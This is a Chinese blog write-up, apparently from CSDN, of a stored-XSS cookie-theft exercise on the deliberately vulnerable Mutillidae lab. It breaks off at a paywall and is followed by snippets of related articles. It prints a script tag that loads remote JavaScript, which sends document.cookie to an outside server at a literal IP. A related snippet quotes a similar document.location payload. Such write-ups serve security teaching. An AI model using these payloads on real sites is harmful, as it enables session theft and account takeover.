mutillidae平台:XSS Payload 之cookie窃取练习

最新推荐文章于 2025-11-12 12:43:48 发布
原创 最新推荐文章于 2025-11-12 12:43:48 发布 · 2.3k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss

本文通过mutillidae平台详细介绍了如何利用XSS漏洞窃取用户cookie。首先创建两个用户,然后使用账号墨中白在XSS博客练习页面插入特定JS代码,当其他用户如test浏览时,其cookie会被发送到服务器日志。通过查看日志,成功获取test用户的cookie,并在Kali系统中利用Burp Suite修改包,实现cookie的窃取和身份冒充。

此次练习主要是用mutillidae靶场实现了《白帽子讲web安全》上的xss payload 窃取用户cookie实例。

需要创建两个用户进行测试:墨中白,test

用账号墨中白进入xss blog练习页面:

在文本框中插入代码

<script type="text/javascript" src="http://47.116.10.120/wxx.js"></script>

连接远程服务器上的js代码执行js源码为:

var str = document.cookie;
var img = document.createElement("img");
img.src = "http://47.116.10.120/log?"+escape(str);
document.body.appendChild(img);

保存后,也就是当别的用户浏览用户墨中白的博客时就会发送他自己的cookie到服务器的一个文件中,服务器中该文件可以不存在直接查看日志也能查到记录 

OK,上传博客。

登录另一个账号test,查看博客:

此时,前面js代码中设置的服务器的日志文件中就已

最低0.47元/天 解锁文章
XSS漏洞利用之cookie获取
渗透之路,攻防之间皆学问
08-01 1万+
目录 环境搭建 盗取cookie 关于documen.cookie获取不到cookie httponly 刚学习xss的时候我们都知道只要能弹窗就肯定存在xss漏洞,也知道xss是可以盗取cookie的,但是至于怎么盗取cookie其实很多同学可能还不是很清楚,也可能并没有实质性的去探讨过这个问题。 环境搭建 思路:攻击者本地搭建的一个网站存在xss漏洞,并且在与网站同一个ip的服务器中使用浏览器进行了登录,此时访问了一个恶意链接,这个恶意链接,直接将cookie获取并发送到hacker服务
mutillidae实战(2)-Add to blog存储型XSS漏洞利用
zhy的博客
09-03 4640
今天主要完成了对Add to blog页面的存储型XSS漏洞利用,利用其完成cookie窃取及利用、网页插入两个简单操作。另外在窃取cookie时,完成了服务器端asp文件的部署,并且在盗取cookie后利用插件完成了身份伪造登录。 难点主要在与服务器的搭建,在服务器搭建时,先是尝试了使用一个新加坡的vps进行cookie收集,但是因为ssh连接的问题始终没有成功,最后采用阿里云服务器成功部署。...
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞。XSS攻击的危害主要有盗取用户cookie、跳转到
【亲测免费】 Mutillidae 项目安装与使用指南
最新发布
gitblog_00969的博客
11-12 729
Mutillidae 是一个开源的、故意存在漏洞的Web应用程序,用于学习和练习Web安全技能。项目的目录结构如下: ``` mutillidae/ ├── config/ │ ├── config.inc │ └── ... ├── css/ │ └── ... ├── images/ │ └── ... ├── includes/ │ └── ... ├── js/ │
XSS-窃取Cookie及拓展
2301_76631050的博客
07-23 2152
步骤一:来到xss平台 点击公共模块---flash弹窗钓⻥-查看将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤二:用记事本打开1.js 修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。步骤七:点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...步骤⼋:配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!步骤二:在我的项目中选择我们刚创建的项目,点击右上角的查看配置代码。把文件复制到我们网站的根目录下。
Web应用安全:XSS盗取cookiepayload.pptx
06-18
XSS 盗取cookie payload 4 Cookie的后利用 3 XSS 盗取cookie payload 实例演示 2 XSS 盗取cookie payload 原理分析 1 cookie简介 目录 cookie简介 Cookie 并不是它的原意“甜饼”的意思, 而是一个保存在客户机中的简单的文本文件, 这个文件与特定的 Web 文档关联在一起, 保存了该客户机访问这个Web 文档时的信息, 当客户机再次访问这个 Web 文档时这些信息可供该文档使用。 举例来说, 一个 Web 站点可能会为每一个访问者产生一个唯一的ID, 然后以 Cookie 文件的形式保存在每个用户的机器上。 也就是如果我们获取到了用户访问网站的cookie,我们就能通过这个cookie,以用户的身份访问该网站。 原理分析 攻击者将可以获取并发送管理员的cookie的恶意XSS脚本到管理员访问的网站。 当管理员访问网站的时候,恶意的XSS脚本将会被运行。 攻击者就可以接收到管理员自动发送的cookie。 原理分析 实例演示 1.攻击者发送恶意XSS脚本到网站中 本次我们使用上一节课程搭建的pikachu站点
xss收集cookie方法(以pikachu靶场举例)
weixin_59047731的博客
01-13 1582
本文提到的收集cookie的后台页面来自于pikachu靶场,只是把它单独提出来弄成一个网站(完整安装皮卡丘的安装包中都有这个pkxss文件的)
XSS payload大全
01-22
- **数据窃取**:攻击者可以通过XSS攻击窃取用户的会话cookie,进而接管用户会话。 - **恶意操作**:在用户不知情的情况下,执行诸如修改页面内容、提交表单等操作。 - **网站污染**:XSS攻击可能会在网站中注入...
技术报告:XSS盗取Cookie
Ciyaso的博客
02-16 2062
文章目录第1章 绪 论1.1 XSS1.1.1 XSS的介绍1.1.2 XSS的种类1.2 Cookie1.2.1 Cookie的介绍1.2.2 Cookie的特性1.2.3 Cookie的功用第2章 相关技术与基础知识简介2.1 基本漏洞测试工具2.2 反射XSS盗取Cookie第3章 漏洞检测实时演示3.1 演示环境3.2 演示步骤3.2.1构建盗取链接3.2.2利用cookie会话劫持3.2.3 上传一句话webshell3.2.4进一步信息读取总 结 第1章 绪 论 1.1 XSS 1.1.1
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 5917
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
利用XSS漏洞打cookie
qq_68163788的博客
01-15 2709
XSS漏洞是一种跨站脚本攻击,攻击者可以在受害者的浏览器中注入恶意脚本,从而获取用户的敏感信息,如cookie。 当受害者访问包含恶意脚本的页面时,恶意脚本会获取受害者的cookie信息,并将其发送到攻击者的服务器。攻击者可以利用这些cookie信息来冒充受害者进行各种操作,比如登录受害者的账户。为了防止XSS漏洞,网站开发者应该对用户输入进行严格的过滤和验证,避免将未经验证的用户输入直接输出到页面上。另外,网站可以使用XSS防护工具或者采用安全的编程实践来防止XSS漏洞的发生。
OWASP Mutillidae II 漏洞靶场实验指导书.pdf
11-20
OWASP Mutillidae II 漏洞靶场实验指导书汇总 OWASP Top 10 应用安全风险-2017 OWASP (Open Web Application Security Project)开放式 Web 应用程序 安全项目,是一个组织,它提供有关计算机和互联网应用程序的公正、实际、有 成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖软件。
网安入门17-XSS(打Cookie
m0_61499194的博客
02-27 1764
来到这个实战网站,两个浏览器注册两个账号zyh666,和zyh999,由于同源策略,Edge和火狐登录同一URL不共享cookie。接下来开始攻击,假设这个钓鱼链接被zyh999点击,那么我们就收到了zyh999的Cookie!此时4个步骤以及完成了第一步,接下来的中间人可以选择一个云服务器,也可以用一个XSS平台。反射型也是一样的,在Edge中存好,用Chrome打开,弹的是两个不同的Cookie。查看代码选项,恶意JS选择第一条payload复制到网站的URL中,构造钓鱼链接。实战打Cookie成功。
[网络安全学习篇附]:Mutillidae 靶场搭建
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
04-30 3276
搭建环境 phpstudy2016 虚拟机win2008 Mutillidae 链接:https://pan.baidu.com/s/1OoXdhOurpTWxWZzqoKNyFg 提取码:do3k 解压,将其移入至phpstudy 网站根目录下, 修改数据库配置文件 ...
XSS基础及实战(XSS提取cookie并登录的)
qidiandexiaowu
09-06 1万+
该学新知识了! 目录XSS基础XSS分类反射型XSS的利用 XSS基础 XSS的定义:XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 XSS分类 XSS有三类:反射型X
OWASP TOP 10(二)XSS漏洞(盗取cookie、ms10_220_aurora漏洞、XSS平台
Pluto.的博客
12-15 747
文章目录OWASP TOP 10XSS一、XSS漏洞----cookie1. 盗取cookie2. 利用cookie会话劫持 OWASP TOP 10 XSS 一、XSS漏洞----cookie 1. 盗取cookie 在DVWA靶场上演示。 存在反射型XSS漏洞的站点位置可以利用以下链接来盗取Cookie。 <script>document.location='http://ip/cookie.php文件的绝对路径?cookie='+document.cookie</script>
【解决方案】mutillidae 2.11.4 靶场在php2018环境下安装报错
qq_45196785的博客
05-19 324
3、D:\software\phpStudy2018\PHPTutorial\WWW\mutillidae\database-offline.php 105行在fsockopen前面加个@将php-7.4.33-nts-Win32-vc15-x64全部文件复制到php-7.2.1-nts。第二步也可以直接在官网下载php7.3以上版本。137行注释提示php版本需要7.3以上。2、版本问题,切换到高版本即可。1、修改数据库名+密码。
Kali Linux 网络扫描秘籍第二版(三)
龙哥盟
06-19 1078
在前面的示例中,我们看到 Sparta 开箱即用的功能。Sparta 的一个很棒的功能是可以添加其他工具。这些工具可以出现在上下文菜单中,结果可以在 Sparta 界面中汇总。在本示例中,我们将介绍如何自定义集成一个新工具。Kali Linux 渗透测试平台提供了大量高效工具,以完成企业渗透测试中常见的任务。然而,也有一些情况下,单一工具不足以完成某项任务。在这种情况下,通常比完全编写新的脚本或程序来完成任务更有效的是,编写利用现有工具的脚本,或根据需要修改它们的行为。
牛!渗透工程师必刷的30个国内外攻防靶场!(超全汇总)
2401_84215240的博客
07-17 1117
网络安全攻防靶场是提升网络安全技能的重要工具之一。通过在这些靶场中进行实战演练和学习,可以更深入地了解网络安全的实际情况和应对方法。无论是基础类靶场、CTF类靶场还是实战类靶场,都为我们提供了宝贵的学习机会和实践经验。希望本文介绍的这些靶场能够帮助大家更好地学习和提升网络安全技能!试、恶意软件分析、事件响应等,并且可以根据用户的具体需求进行定制化的培训服务。官网地址网络安全攻防靶场是提升网络安全技能的重要工具之一。通过在这些靶场中进行实战演练和学习,可以更深入地了解网络安全的实际情况和应对方法。
Django实现XSS平台:简单步骤与关键代码解析
这些命令可能包括窃取用户cookie、重定向用户到恶意网站等。XSS分为存储型、反射型和DOM型三种类型,每种都有不同的触发机制和防范策略。 3) Django框架简介 Django是一个高级的Python Web框架,它鼓励快速开发和...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值